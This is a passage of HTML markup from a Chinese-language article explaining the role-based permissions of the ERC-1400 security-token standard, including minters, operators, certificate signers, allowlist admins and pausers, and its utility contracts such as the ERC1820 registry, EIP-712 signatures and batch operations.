normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：Ownable.sol 及 ERC1400.sol 中的 onlyOwner 修饰符。</span></span></p></li></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">控制者(Controller)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：这一角色是监管合规在链上的直接体现。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：ERC1400.sol 中的 _controllers 列表及 onlyTokenController。</span></span></p></li></ul></ul><p><b data-pm-slice="0 0 []"><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-7394a90c-7fff-a284-0716-7ff8a839ff92&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;heading&#34;,{&#34;tagName&#34;:&#34;h4&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt; text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;,&#34;level&#34;:4},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 18px;font-weight: bold;">4.2 资产发行层：铸币者与预言机 </span></span></h4></b></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是系统的&#34;心脏&#34;，负责资产的生命周期管理。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">铸币者(Minter)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：掌握着证券供应的核心权力。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：MinterRole.sol 及其修饰器 onlyMinter。</span></span></p></li></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">价格预言机(PriceOracle)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：在基金发行(Fund Issuance) 场景中，PriceOracle 扮演着公正第三方的角色。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：FundIssuer.sol 中的 onlyPriceOracle。</span></span></p></li></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代币控制器(TokenController)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：在 FundIssuer 等工具合约的上下文中，TokenController 类似于基金经理的角色，负责配置特定资产(Asset) 的发行规则、费率参数以及生命周期管理。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：FundIssuer.sol 中的 _tokenControllers。</span></span></p></li></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">4.3 运营执行层：操作员与交易执行者 </span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是系统的&#34;四肢&#34;，负责日常的价值流转。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">操作员(Operator)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：这是最为活跃的角色，代表代币持有者执行日常转账操作。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：ERC1400.sol 中的 isOperator 逻辑。</span></span></p></li></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">交易执行者(TradeExecuter)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：在原子交换(Atomic Swap) 或 DVP（券款对付）交易中，TradeExecuter（通常对应 Hold 机制中的 notary 公证人）有权在满足特定条件时，强制执行已锁定的订单，完成资产交割。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：ERC1400TokensValidator.sol 及 Swaps.sol 中的 Hold 逻辑。</span></span></p></li></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">4.4 合规风控层：证书签名者与名单管理员 </span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是系统的&#34;免疫系统&#34;，负责识别风险并保障合规。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">证书签名者(CertificateSigner)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：这是连接链下合规与链上执行的桥梁。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：ERC1400TokensValidator.sol 中的签名验证逻辑。</span></span></p></li></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">白名单/黑名单管理员(AllowlistAdmin/BlocklistAdmin)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：这是合规的第一道防线。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现：AllowlistedRole.sol 和 BlocklistedRole.sol。</span></span></p></li></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">暂停者(Pauser)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：拥有市场&#34;熔断&#34;权力的角色。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码体现： Pausable.sol 中的 pause / unpause。</span></span></p></li></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.235546875" data-s="300,640" data-type="png" data-w="2560" style="margin-left: 0px;margin-top: 0px;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/8z8bibAexaCLjdjW5N9MmibcB4c4xkImTWFiaB0txOJJZ4aQH4MTY5A2kaepTpSmWRuYCLJ1iaokmhqUib3EE4rMPGGWiazatIrFKRLxVt4meWiaXk/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="136" data-imgfileid="100021211" src="https://wechat2rss.xlab.app/img-proxy/?k=3a4f9932&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCLjdjW5N9MmibcB4c4xkImTWFiaB0txOJJZ4aQH4MTY5A2kaepTpSmWRuYCLJ1iaokmhqUib3EE4rMPGGWiazatIrFKRLxVt4meWiaXk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5、工具合约：提升系统的互操作性与可用性</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-1400 协议族不仅仅定义了单一的代币标准，还提供了一套工具合约生态，旨在解决 RWA 在实际落地中遇到的互操作性、安全性和效率问题。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">5.1 ERC1820 注册表</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">实现服务的动态发现 ERC1820 是一个全局接口注册表，它解决了合约之间&#34;如何找到对方&#34;的问题。在 ERC-1400 的架构中，ERC1820 扮演着桥梁的角色，使得核心合约能够动态发现和调用扩展合约。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">5.2 EIP-712 域分隔符</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">签名安全的技术保障 EIP-712 标准定义了结构化数据的签名格式，这是证书验证机制(Certificate) 的技术基础。相比于简单的消息签名，EIP-712 提供了更高的安全性和用户友好性。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">5.3 批量操作工具</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">证券发行和管理常常涉及大量的批量操作。一次融资可能需要向数百个投资者发行证券，一次分红可能需要向数千个股东转账。如果逐笔操作，不仅耗时费力，还会产生高昂的 Gas 费用。ERC-1400 提供的批量操作工具有效解决了这个问题。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang 